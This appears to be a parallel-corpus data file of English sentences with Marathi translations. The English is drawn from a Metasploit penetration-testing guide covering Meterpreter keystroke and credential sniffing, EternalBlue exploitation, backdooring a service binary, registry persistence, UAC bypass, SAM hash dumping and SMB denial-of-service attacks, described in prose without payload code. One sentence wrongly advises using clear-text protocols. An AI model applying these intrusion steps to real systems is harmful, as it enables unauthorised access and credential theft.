| {"en":"To remove a file or a directory from the target machine, we can use the rm command.","translation":"लक्ष्यित मशीनमधून फाईल किंवा डिरेक्टरी काढण्यासाठी, आपण rm कमांड वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Editing files using Meterpreter can be done by using the edit command, which uses vim so all the editor's commands are available.","translation":"मीटरप्रेटर वापरून फाईल्स संपादित करणे 'एडिट' कमांड वापरून करता येते, जे 'विम' वापरते, त्यामुळे एडिटरचे सर्व कमांड उपलब्ध आहेत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"One of my favorite commands is the show_mount command, which allows you to list all mount points/logical drives in the target system.","translation":"माझे आवडते कमांड्सपैकी एक म्हणजे show_mount कमांड, जे तुम्हाला लक्ष्यित सिस्टममधील सर्व माउंट पॉइंट्स/लॉजिकल ड्राइव्ह सूचीबद्ध करण्यास अनुमती देते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To display all the available commands, you can use the help command followed by the group of commands you want to display.","translation":"उपलब्ध असलेले सर्व कमांड्स प्रदर्शित करण्यासाठी, तुम्ही help कमांड वापरू शकता, त्यानंतर तुम्हाला प्रदर्शित करायचे असलेल्या कमांड्सचा समूह लिहा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Meterpreter gives us complete access to the target machine by setting up an interactive command prompt.","translation":"मीटरप्रेटर आम्हाला एक इंटरएक्टिव्ह कमांड प्रॉम्प्ट सेट करून लक्ष्यित मशीनवर पूर्ण प्रवेश देतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also drop a shell session to work in the default Windows DOS mode, but it will not have as many functionalities.","translation":"आपण डीफॉल्ट विंडोज DOS मोडमध्ये काम करण्यासाठी शेल सेशन देखील टाकू शकतो, परंतु त्यात जास्त कार्यक्षमता नसेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This was a quick reference to some of the important filesystem commands of Meterpreter, which can help us in exploring the files present on the target machine.","translation":"हे मीटरप्रेटरच्या काही महत्त्वाच्या फाइलसिस्टम कमांड्सचा त्वरित संदर्भ आहे, जे लक्ष्यित मशीनवर उपस्थित असलेल्या फाईल्सचा शोध घेण्यात मदत करू शकतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In the next recipe, we will look at a very interesting Meterpreter command called timestomp, which can be used to modify the file attributes on the target machine.","translation":"पुढील कृतीमध्ये, आपण timestomp नावाचे एक अतिशय मनोरंजक मीटरप्रेटर कमांड पाहू, जे लक्ष्यित मशीनवरील फाईल विशेषतांमध्ये बदल करण्यासाठी वापरले जाऊ शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Meterpreter provides us with some useful networking commands as well.","translation":"मीटरप्रेटर आपल्याला काही उपयुक्त नेटवर्किंग कमांड्स देखील पुरवतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"These commands can be useful in understanding the network structure of the target user.","translation":"हे कमांड्स लक्ष्यित वापरकर्त्याच्या नेटवर्क संरचनेची माहिती मिळवण्यासाठी उपयुक्त ठरू शकतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We can analyze whether the system belongs to a LAN or if it is a standalone system.","translation":"आपण हे विश्लेषण करू शकतो की सिस्टम LAN शी संबंधित आहे की नाही किंवा ते एक स्वतंत्र सिस्टम आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also find out the IP range, DNS, and other information.","translation":"आपण IP रेंज, DNS आणि इतर माहिती देखील शोधू शकतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Such network information can be useful when we have to perform pivoting.","translation":"अशी नेटवर्क माहिती पिव्हटिंग (pivoting) करताना उपयुक्त ठरू शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Pivoting is a concept by which we can compromise other machines on the same network in which our target is present.","translation":"पिव्हटिंग ही एक संकल्पना आहे ज्याद्वारे आपण त्याच नेटवर्कमधील इतर मशीनशी तडजोड करू शकतो ज्यात आपले लक्ष्य उपस्थित आहे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"We will also understand pivoting, where we will focus on the advanced use of Meterpreter.","translation":"आम्ही पिव्हटिंग देखील समजून घेऊ, जेथे आम्ही मीटरप्रेटरच्या प्रगत वापरांवर लक्ष केंद्रित करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Subnetwork or subnet is the concept of dividing a large network into smaller, identifiable parts.","translation":"सबनेटवर्क किंवा सबनेट ही मोठ्या नेटवर्कला लहान, ओळखता येण्याजोग्या भागांमध्ये विभागण्याची संकल्पना आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Subnetting is done to increase the address utility and security.","translation":"पत्ता उपयोगिता आणि सुरक्षा वाढवण्यासाठी सबनेटिंग केले जाते.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The gateway specifies the forwarding or the next hop IP address over which the set of addresses defined by the network destination and subnet mask are reachable.","translation":"गेटवे (gateway) फॉरवर्डिंग किंवा पुढील हॉप IP ऍड्रेस निर्दिष्ट करते, ज्याद्वारे नेटवर्क डेस्टिनेशन आणि सबनेट मास्कद्वारे परिभाषित केलेल्या पत्त्यांपर्यंत पोहोचता येते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To generate some traffic, we will log in to the Metasploitable 3 machine.","translation":"काही रहदारी निर्माण करण्यासाठी, आम्ही Metasploitable 3 मशीनमध्ये लॉग इन करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Then, we will stop the sniffer using the sniffer_stop 3 command.","translation":"त्यानंतर, आम्ही sniffer_stop 3 कमांड वापरून स्निफर थांबवू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Download the PCAP using the sniffer_dump 3 command.","translation":"sniffer_dump 3 कमांड वापरून PCAP डाउनलोड करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we have the PCAP file, we can use tcpdump.","translation":"आता आपल्याकडे PCAP फाइल आहे, आम्ही tcpdump वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Looking at the output, we can see that we were able to capture the FTP credentials.","translation":"आउटपुट पाहता, आपण पाहू शकतो की आम्ही FTP क्रेडेन्शियल्स कॅप्चर करू शकलो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"This is the reason why you should use clear text protocols, such as FTP and Telnet.","translation":"यामुळेच तुम्ही FTP आणि Telnet सारखे स्पष्ट मजकूर प्रोटोकॉल वापरावेत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In the previous two chapters, we learned extensively about using Meterpreter.","translation":"मागील दोन प्रकरणांमध्ये, आम्ही मीटरप्रेटर वापरण्याबद्दल विस्तृतपणे शिकलो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now, from this recipe, we will move ahead and discuss some advanced concepts related to Meterpreter.","translation":"आता, या रेसिपीमधून, आम्ही पुढे जाऊ आणि मीटरप्रेटर संबंधित काही प्रगत संकल्पनांवर चर्चा करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"From a penetration tester's point of view, it is essential to know how to implement our own scripting techniques.","translation":"एका पेनिट्रेशन परीक्षकाच्या दृष्टिकोनातून, आपल्या स्वतःच्या स्क्रिप्टिंग तंत्रांना कसे लागू करावे हे जाणून घेणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"There can be situations when you have to perform tasks where Meterpreter may not be enough.","translation":"अशा परिस्थितीत जेव्हा तुम्हाला अशी कामे करावी लागतील जिथे मीटरप्रेटर पुरेसे नसेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This is where developing our own scripts and modules come in handy.","translation":"येथेच आपले स्वतःचे स्क्रिप्ट्स आणि मॉड्यूल्स विकसित करणे उपयुक्त ठरते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The Meterpreter API can be helpful for programmers to implement their own scripts.","translation":"मीटरप्रेटर API प्रोग्रामर्ससाठी त्यांचे स्वतःचे स्क्रिप्ट्स लागू करण्यासाठी उपयुक्त ठरू शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We will be dealing with Ruby scripts in the next few recipes.","translation":"पुढील काही रेसिपीमध्ये, आम्ही रूबी स्क्रिप्ट्सवर काम करू.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Let's start by launching an interactive Ruby shell with Meterpreter.","translation":"चला मीटरप्रेटरसह एक इंटरएक्टिव्ह रूबी शेल सुरू करून सुरुवात करूया.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we are in the Ruby shell, we can execute our Ruby scripts.","translation":"आता आपण रूबी शेलमध्ये आहोत, आम्ही आमचे रूबी स्क्रिप्ट्स कार्यान्वित करू शकतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Let's use the framework object and display information about our session.","translation":"चला फ्रेमवर्क ऑब्जेक्ट वापरूया आणि आमच्या सत्राबद्दल माहिती प्रदर्शित करूया.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Use client to display information about our target machine.","translation":"आमच्या लक्ष्यित मशीनबद्दल माहिती प्रदर्शित करण्यासाठी क्लायंट वापरा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"This call will print the output and add a carriage return at the end.","translation":"हे कॉल आउटपुट मुद्रित करेल आणि शेवटी कॅरेज रिटर्न (carriage return) जोडेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This call is used most often in the scripting language.","translation":"हा कॉल स्क्रिप्टिंग भाषेत सर्वात जास्त वापरला जातो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Railgun is the obvious answer.","translation":"रेलगन हे स्पष्ट उत्तर आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"If you have to sniff the login password, you will have to change the active desktop to Session 0/WinSta0/Winlogon.","translation":"जर तुम्हाला लॉगिन पासवर्डचा मागोवा घ्यायचा असेल, तर तुम्हाला सक्रिय डेस्कटॉप सेशन 0/WinSta0/Winlogon वर बदलावे लागेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's check our current desktop using the getdesktop command.","translation":"चला, getdesktop कमांड वापरून आपला सध्याचा डेस्कटॉप तपासूया.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"So, if we run a keystroke capture here, it won't return any result.","translation":"म्हणून, जर आपण येथे कीस्ट्रोक कॅप्चर चालवले, तर ते कोणतेही परिणाम देणार नाही.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's change our desktop to WinSta0\\Default.","translation":"चला, आपला डेस्कटॉप WinSta0\\Default वर बदलूया.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"So, now we are ready to run a keystroke sniffer to capture the keys pressed by the user on the target machine.","translation":"म्हणून, आता आपण लक्ष्यित मशीनवर वापरकर्त्याने दाबलेल्या कळा कॅप्चर करण्यासाठी कीस्ट्रोक स्निफर चालवण्यासाठी तयार आहोत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Looking at the dumped keystrokes, you can clearly identify that the target user went to gmail.com and entered his/her credentials to log in.","translation":"डम्प केलेल्या कीस्ट्रोककडे पाहता, आपण स्पष्टपणे ओळखू शकता की लक्ष्यित वापरकर्ता gmail.com वर गेला आणि लॉग इन करण्यासाठी त्याचे क्रेडेन्शियल्स (credentials) प्रविष्ट केले.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"What if you want to sniff the Windows login password?","translation":"जर तुम्हाला विंडोज लॉगिन पासवर्डचा मागोवा घ्यायचा असेल तर?","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Obviously, you can switch your active desktop to WinSta0\\Winlogon using the setdesktop command, but here we will discuss an alternate approach as well.","translation":"स्पष्ट आहे की, तुम्ही setdesktop कमांड वापरून तुमचा सक्रिय डेस्कटॉप WinSta0\\Winlogon वर स्विच करू शकता, परंतु येथे आपण पर्यायी दृष्टिकोन देखील चर्चा करू.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"We can migrate to a process which runs during the Windows login.","translation":"आम्ही विंडोज लॉगइन दरम्यान चालणाऱ्या प्रक्रियेवर स्थलांतरित होऊ शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's execute the ps command to check the running processes.","translation":"चला, चालू असलेल्या प्रक्रिया तपासण्यासाठी ps कमांड कार्यान्वित करूया.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"You will find winlogon.exe running as a process with a process ID.","translation":"तुम्हाला winlogon.exe प्रक्रिया आयडी (process ID) सह एक प्रक्रिया म्हणून चालताना दिसेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now, let's migrate to this PID and check our active desktop again.","translation":"आता, या PID वर स्थलांतरित होऊया आणि पुन्हा आपला सक्रिय डेस्कटॉप तपासूया.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"You can see that our active desktop has changed to WinSta0\\Winlogon.","translation":"तुम्ही पाहू शकता की आपला सक्रिय डेस्कटॉप WinSta0\\Winlogon वर बदलला आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To capture the login password, log into the Metasploitable 3 machine and then use the keyscan_dump Meterpreter command to dump the keystrokes.","translation":"लॉगिन पासवर्ड कॅप्चर करण्यासाठी, Metasploitable 3 मशीनमध्ये लॉग इन करा आणि नंतर कीस्ट्रोक डंप करण्यासाठी keyscan_dump Meterpreter कमांड वापरा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Similarly, we can get back to the Default desktop by migrating to any process which is running on the default desktop; for example, explorer.exe.","translation":"त्याचप्रमाणे, आपण डीफॉल्ट डेस्कटॉपवर चालणाऱ्या कोणत्याही प्रक्रियेवर स्थलांतरित होऊन डीफॉल्ट डेस्कटॉपवर परत येऊ शकतो; उदाहरणार्थ, explorer.exe.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Generally, people do not get any results when they directly run keyscan without having a look at the current active desktop.","translation":"सर्वसाधारणपणे, लोक वर्तमान सक्रिय डेस्कटॉप न पाहता थेट कीस्कॅन (keyscan) चालवतात तेव्हा त्यांना कोणतेही परिणाम मिळत नाहीत.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"This is because the process they have penetrated might belong to a different session or station.","translation":"याचे कारण असे आहे की त्यांनी ज्या प्रक्रियेत प्रवेश केला आहे, ती कदाचित वेगळ्या सत्राची किंवा स्टेशनची असेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"So keep this concept in mind while working with keystroke sniffing.","translation":"म्हणून, कीस्ट्रोक स्निफिंगवर काम करत असताना ही संकल्पना लक्षात ठेवा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Once we are in a Meterpreter session, you can simply take some screenshots using the screenshot command.","translation":"एकदा आपण मीटरप्रेटर सत्रात (Meterpreter session) प्रवेश केला की, आपण स्क्रीनशॉट कमांड वापरून काही स्क्रीनशॉट घेऊ शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To display the captured screenshot, you can use the eog command in a new Terminal window.","translation":"कॅप्चर केलेला स्क्रीनशॉट प्रदर्शित करण्यासाठी, आपण नवीन टर्मिनल विंडोमध्ये eog कमांड वापरू शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Checking target architecture...","translation":"लक्ष्य आर्किटेक्चर तपासत आहे...","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Since the target doesn't have a root password, it is possible to use the MySQL service to upload a shell and gain remote access to the system.","translation":"लक्ष्यावर रूट पासवर्ड नसल्यामुळे, शेल अपलोड करण्यासाठी आणि सिस्टमवर रिमोट ऍक्सेस मिळवण्यासाठी MySQL सेवेचा वापर करणे शक्य आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This vulnerability affects Windows machines without security update MS17-010 for Microsoft Windows SMB Server SMBv1 Server.","translation":"ही असुरक्षितता मायक्रोसॉफ्ट विंडोज SMB सर्व्हर SMBv1 सर्व्हरसाठी MS17-010 सुरक्षा अपडेट नसलेल्या विंडोज मशीनवर परिणाम करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To launch the exploit, use the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module, set the target IP address, use a meterpreter reverse TCP payload, and specify the listening address.","translation":"एक्सप्लॉइट सुरू करण्यासाठी, MS17-010 EternalBlue SMB रिमोट विंडोज कर्नल पूल करप्शन एक्सप्लॉइट मॉड्यूल वापरा, लक्ष्य IP पत्ता सेट करा, मीटरप्रेटर रिव्हर्स TCP पेलोड वापरा आणि ऐकण्याचा पत्ता निर्दिष्ट करा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"One outcome of a penetration test that differentiates it from a vulnerability scanner, is that no one will state that what you've found is a false positive when you present them with a screenshot of a shell running on the target system.","translation":"एका पेनिट्रेशन टेस्टचा एक परिणाम, जो तिला असुरक्षितता स्कॅनरपेक्षा वेगळा करतो, तो म्हणजे जेव्हा तुम्ही त्यांना लक्ष्य प्रणालीवर चालणाऱ्या शेलचा स्क्रीनशॉट सादर करता, तेव्हा कोणीही असे म्हणणार नाही की तुम्हाला जे सापडले आहे ते खोटे सकारात्मक आहे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Having a shell on the target system is great, but sometimes it is not enough.","translation":"लक्ष्य प्रणालीवर शेल असणे उत्तम आहे, परंतु काहीवेळा ते पुरेसे नसते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"With a backdoor, we will be able to ensure persistence and get access to the system, even if the vulnerability gets patched.","translation":"बॅकडोअरसह, आम्ही सातत्य सुनिश्चित करू शकू आणि सिस्टममध्ये प्रवेश मिळवू शकू, जरी असुरक्षितता पॅच केली गेली तरी.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Since we cannot backdoor a binary while it is running, the first thing we need to do is to kill the Apache process (httpd.exe), using the kill command followed by the PID of the process.","translation":"आम्ही बायनरी बॅकडोअर करू शकत नसल्यामुळे, ती चालू असताना, पहिली गोष्ट जी आपल्याला करायची आहे ती म्हणजे किल कमांड वापरून Apache प्रक्रिया (httpd.exe) मारणे, त्यानंतर प्रक्रियेचा PID.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To backdoor the service, we will use msfconsole, with a reverse TCP.","translation":"सेवेला बॅकडोअर करण्यासाठी, आम्ही रिव्हर्स TCP सह msfconsole वापरू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we have the backdoor ready, we need to start a listener for the reverse connection; for that we will use the Generic Payload Handler.","translation":"आता आपल्याकडे बॅकडोअर तयार आहे, आम्हाला रिव्हर्स कनेक्शनसाठी एक श्रोता सुरू करणे आवश्यक आहे; यासाठी आम्ही जेनेरिक पेलोड हँडलर वापरू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Back in the session, we will rename the httpd.exe file to httpd.exe.backup, upload the backdoored version, and rename it to httpd.exe.","translation":"सत्रात परत, आम्ही httpd.exe फाइलचे नाव httpd.exe.backup असे बदलू, बॅकडोअर केलेले व्हर्जन अपलोड करू आणि त्याचे नाव httpd.exe असे ठेवू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To use the Windows Registry Only Persistence module, we need to specify the session to run the module on, in this case, session 1 with what we got from the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit; set the payload; set the listening IP address; and use the exploit command to launch the exploit.","translation":"विंडोज रजिस्ट्री ओन्ली परसिस्टन्स मॉड्यूल वापरण्यासाठी, आम्हाला ज्या सत्रावर मॉड्यूल चालवायचे आहे ते निर्दिष्ट करणे आवश्यक आहे, या प्रकरणात, MS17-010 EternalBlue SMB रिमोट विंडोज कर्नल पूल करप्शन एक्सप्लॉइटमधून जे मिळाले आहे ते सत्र 1; पेलोड सेट करा; ऐकण्याचा IP पत्ता सेट करा; आणि एक्सप्लॉइट सुरू करण्यासाठी एक्सप्लॉइट कमांड वापरा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To trigger the exploit, simply reboot the Metasploitable 3 machine and we will get a new session.","translation":"एक्सप्लॉइट सुरू करण्यासाठी, फक्त Metasploitable 3 मशीन रीबूट करा आणि आम्हाला नवीन सत्र मिळेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Great, we got a new session from the target system.","translation":"उत्तम, आम्हाला लक्ष्य प्रणालीवरून नवीन सत्र मिळाले.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"A Denial of Service (DoS) attack denies legitimate users access to computer services (or resources), usually by overloading the service with requests or by exploiting vulnerabilities, resulting in a degradation of performance, and possibly crashing the service or even the operating system.","translation":"डिनियल ऑफ सर्व्हिस (DoS) हल्ला, कायदेशीर वापरकर्त्यांना संगणक सेवा (किंवा संसाधने) वापरण्यापासून प्रतिबंधित करतो, सामान्यतः सेवेवर विनंत्यांचा अतिभार टाकून किंवा असुरक्षिततेचा फायदा घेऊन, ज्यामुळे कार्यक्षमतेत घट होते आणि संभाव्यतः सेवा किंवा ऑपरेटिंग सिस्टम क्रॅश होते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Before using the SMBLoris NBSS Denial of Service auxiliary DoS module, we need to use the ulimit command to set the maximum number of open file descriptors to 65535, so we can handle simultaneous connections.","translation":"SMBLoris NBSS Denial of Service सहाय्यक DoS मॉड्यूल वापरण्यापूर्वी, आम्हाला ulimit कमांड वापरून जास्तीत जास्त ओपन फाइल डिस्क्रिप्टर्स 65535 वर सेट करणे आवश्यक आहे, जेणेकरून आम्ही एकाच वेळी कनेक्शन हाताळू शकू.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"We can launch msfconsole with the -q option, so it does not print the banner on startup.","translation":"आम्ही -q पर्यायासह msfconsole सुरू करू शकतो, जेणेकरून ते स्टार्टअपवर बॅनर मुद्रित करत नाही.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Looking at the target machine, we can see the attack consumes large chunks of memory in the target by sending SMB requests with the NetBIOS Session Service (NBSS) length header value set to the maximum possible value, which initiates a large numbers of sessions, and the memory does not get freed, halting the target machine.","translation":"लक्ष्य मशीनकडे पाहता, आपण पाहू शकतो की हा हल्ला लक्ष्यमध्ये मोठ्या प्रमाणात मेमरी वापरतो, NetBIOS सेशन सर्व्हिस (NBSS) लांबी हेडर व्हॅल्यू जास्तीत जास्त मूल्यावर सेट करून SMB विनंत्या पाठवून, जे मोठ्या संख्येने सत्र सुरू करते आणि मेमरी मुक्त होत नाही, ज्यामुळे लक्ष्य मशीन थांबते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"If Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012 is running an IIS service without the MS15-034, we can crash the target using this simple attack.","translation":"जर मायक्रोसॉफ्ट विंडोज 7, विंडोज 8, विंडोज सर्व्हर 2008, किंवा विंडोज सर्व्हर 2012 MS15-034 शिवाय IIS सेवा चालवत असेल, तर आपण या साध्या हल्ल्याचा वापर करून लक्ष्य क्रॅश करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we will focus on Meterpreter, the most advanced payload in Metasploit, and what we can do after we have exploited the target machine.","translation":"या अध्यायात, आम्ही मीटरप्रेटरवर लक्ष केंद्रित करू, जे मेटास्प्लॉइटमधील सर्वात प्रगत पेलोड आहे, आणि लक्ष्य मशीनचा फायदा घेतल्यानंतर आपण काय करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This command is used to migrate from one process context to another.","translation":"हा आदेश एका प्रक्रियेच्या संदर्भातून दुसऱ्या प्रक्रियेकडे स्थलांतरित होण्यासाठी वापरला जातो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We can migrate to any other active process by using the process name or the ID.","translation":"आम्ही प्रक्रिया नाव किंवा आयडी वापरून इतर कोणत्याही सक्रिय प्रक्रियेवर स्थलांतरित होऊ शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The ps command can be used to identify all active processes along with their names and IDs.","translation":"ps कमांडचा वापर सर्व सक्रिय प्रक्रिया, त्यांची नावे आणि आयडी ओळखण्यासाठी केला जाऊ शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"These two Meterpreter commands are very handy and are used frequently during penetration testing.","translation":"हे दोन मीटरप्रेटर कमांड खूप उपयुक्त आहेत आणि पेनिट्रेशन टेस्टिंग दरम्यान वारंवार वापरले जातात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Although still used, UAC is inherently broken and can be trivially defeated.","translation":"जरी अजूनही वापरले जात असले तरी, UAC मुळातच सदोष आहे आणि ते सहजपणे पराभूत केले जाऊ शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"For this recipe, we will target the Windows 7 machine.","translation":"या कृतीसाठी, आम्ही विंडोज 7 मशीनवर लक्ष्य ठेवू.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To generate the backdoor, we will use a Windows Meterpreter reverse TCP payload.","translation":"बॅकडोअर तयार करण्यासाठी, आम्ही विंडोज मीटरप्रेटर रिव्हर्स TCP पेलोड वापरू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"After setting the listening address with the LHOST option and looking at the available options for the generate command, we will use the -t option for the output format.","translation":"LHOST पर्यायासह ऐकण्याचा पत्ता सेट केल्यानंतर आणि जनरेट कमांडसाठी उपलब्ध पर्याय पाहिल्यानंतर, आम्ही आउटपुट फॉरमॅटसाठी -t पर्याय वापरू.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Now that we have created the backdoor, we need to set up a listener to receive the reverse shell.","translation":"आता आपण बॅकडोअर तयार केले आहे, आम्हाला रिव्हर्स शेल प्राप्त करण्यासाठी एक श्रोता (listener) सेट करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"By starting the listener with run -j, it will run it in the context of a job, allowing us to continue using the msfconsole.","translation":"run -j सह श्रोता सुरू करून, ते नोकरीच्या संदर्भात चालवेल, ज्यामुळे आम्हाला msfconsole वापरणे सुरू ठेवता येईल.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To copy the backdoor to the target, we can use the FTP File Server auxiliary module.","translation":"बॅकडोअर लक्ष्यस्थानी कॉपी करण्यासाठी, आम्ही FTP फाइल सर्व्हर सहाय्यक मॉड्यूल वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"If everything went well, we should have a new Meterpreter session on the target machine.","translation":"सर्व काही ठीक झाले, तर आपल्याकडे लक्ष्य मशीनवर नवीन मीटरप्रेटर सत्र (session) असले पाहिजे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Now that we have a session on the target machine, one of the first things we want is to try to elevate our privileges.","translation":"आता आपल्याकडे लक्ष्य मशीनवर सत्र (session) आहे, आपल्याला प्रथम करायची गोष्ट म्हणजे आपले विशेषाधिकार वाढवण्याचा प्रयत्न करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"However, privilege escalation using the getsystem command fails because of UAC.","translation":"परंतु, getsystem कमांड वापरून विशेषाधिकार वाढवणे UAC मुळे अयशस्वी होते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Before we can use getsystem to perform a privilege escalation attack, we first need to bypass UAC.","translation":"आम्ही getsystem वापरून विशेषाधिकार वाढवण्याचा हल्ला (attack) करू शकण्यापूर्वी, आम्हाला प्रथम UAC बायपास करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"As you can see, bypassing UAC is easy, which is why you should not rely on UAC as a security mechanism.","translation":"तुम्ही पाहू शकता की, UAC बायपास करणे सोपे आहे, म्हणूनच तुम्ही सुरक्षा यंत्रणेसाठी UAC वर अवलंबून राहू नये.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Security Accounts Manager (SAM) is a database in the Windows operating system that contains usernames and passwords.","translation":"सिक्युरिटी अकाउंट्स मॅनेजर (SAM) हे विंडोज ऑपरेटिंग सिस्टममधील एक डेटाबेस आहे, ज्यामध्ये वापरकर्तानाव (username) आणि पासवर्ड असतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In this recipe, you will learn about some of the most common ways to dump local user accounts from the SAM database.","translation":"या कृतीमध्ये, आपण SAM डेटाबेसवरून स्थानिक वापरकर्ता खाती डंप (dump) करण्याचे काही सामान्य मार्ग शिकाल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we will start with the classic Meterpreter hashdump command.","translation":"सुरुवातीला, आपण क्लासिक मीटरप्रेटर हॅशडंप कमांडने सुरुवात करू.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
